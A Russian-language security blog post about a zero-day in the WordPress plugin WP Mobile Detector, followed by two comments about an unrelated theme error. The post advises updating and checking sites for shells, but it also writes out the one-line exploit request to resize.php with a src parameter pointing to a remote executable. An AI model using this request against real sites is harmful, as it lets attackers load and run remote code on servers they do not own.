В одном известном плагине Wordpress была обнаружена уязвимость нулевого дня. Первые атаки на WP Mobile Detector зафиксированы с 27 мая, однако обнародована критическая уязвимость была лишь 31, и буквально несколько часов назад была выпущена новая версия, закрывающая дыру.

Критическая уязвимость нулевого дня в плагине Wordpress WP Mobile Detector
Критическая уязвимость нулевого дня в плагине Wordpress WP Mobile Detector

Уязвимость в WP Mobile Detector относится к критической, так как позволяет исполнять любой произвольный код с удаленного сервера.

Виновато оказалось отсутствие фильтрации любых Get и Post запросов  в файлах resize.php и timthumb.php

В результате можно загрузить и исполнить любой внешний код простым запросом

/wp-content/plugins/wp-mobile-detector/resize.php?src=MyExploit

где в  MyExploit надо поставить ссылку для исполняемого файла.

Уязвимы все версии WP Mobile Detector 3.х до 3.6

Всем вебмастерам на Wordpress советую проверить наличие WP Mobile Detector в  списке установленных, и если уязвимый плагин находится на сайте, обязательно обновить его и проверить сайт на вирусы - хакеры могли занести шеллы на сайт, для эксплуатации в своих корыстных целях позднее. К тому же, большинство взломов характеризовалось сео-спамом, а такое лучше заранее предотвратить, чем потом потратить месяцы на восстановление результата.

Этот пример в очередной раз показывает, насколько надо быть осторожным в выборе сторонних плагинов, а также о преждевременной защите своих сайтов.

Комментарии   
0 # Елена 17.08.2016 05:33
Здравствуйте!
Дело в том, что после очередного автоматического обновления версии движка, а точнее после установки версии 4.0, появилось несколько ошибок в админке сайта, а именно при заходе на страницу внешний вид-настройка темы, выдаёт ошибку, а дословно "Страница не работает, сайт пока не может обработать этот запрос", в общем если я хочу сменить тему или подредактироват ь её, то теперь этого не сделать, да ещё и ошибка в видимой части сайта, появилась странная надпись вместо удалённой страницы, под шапкой, хотя её вообще быть не должно. Пробовала переустановить версию в ручную, но ничего не изменилось. Помогите решить данную проблему! Спасибо!
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 17.08.2016 07:06
А тема больше не обновляется? Просто если ваша тема не поддерживается на версии 4 вордпресса, то её нужно или подредактироват ь под новую версию либо установить другую тему.
Поменять тему можно через базу данных.
Также можно сделать полную копию сайта с бд и установить чистую версию вордпресса и новую тему, и потом переносить все данные.
Ответить | Ответить с цитатой | Цитировать
Добавить комментарий